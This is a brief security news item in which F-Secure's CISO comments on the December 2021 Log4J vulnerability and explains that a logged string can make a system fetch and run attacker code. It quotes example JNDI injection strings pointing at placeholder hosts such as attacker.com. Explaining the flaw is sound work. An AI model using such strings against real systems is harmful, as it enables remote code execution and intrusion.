F-Secure reserach blog and comment on Log4J vulnerability
December 2021 by Erka Koivunen, F-Secure’s Chief Information Security Officer
Following the news of the Log4J vulnerability, F-Secure has released a blog with research and notes on the issue.
A vulnerability in the Log4J library identified on Friday, December 10th is rocking software vendors and service providers around the globe. The weakness in the standardized method of handling log messages within software ranging from Microsoft’s Minecraft to ecommerce platforms is already under assault by attackers.
Erka Koivunen, F-Secure’s Chief Information Security Officer, comments on the incident:
“It’s a design failure of catastrophic proportions. All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j. In the simplest terms, it allows an attacker to cause the target system to fetch and run code from a remote location controlled by the attacker. The second stage - what the downloaded malicious code does next - is fully up to the attacker.”
“Please don’t change your Tesla or iPhone name into $jndi:ldap://url/a unless you want unexpected user experience,” he says, half-jokingly.
“Using Log4J’s formatting language could trigger code in vulnerable applications around the globe. Just the mention of the phrase like “$jndi:ldap://attacker.com/pwnyourserver” in a Minecraft chat, for instance, could set off a security firestorm at Microsoft in an unpatched system.”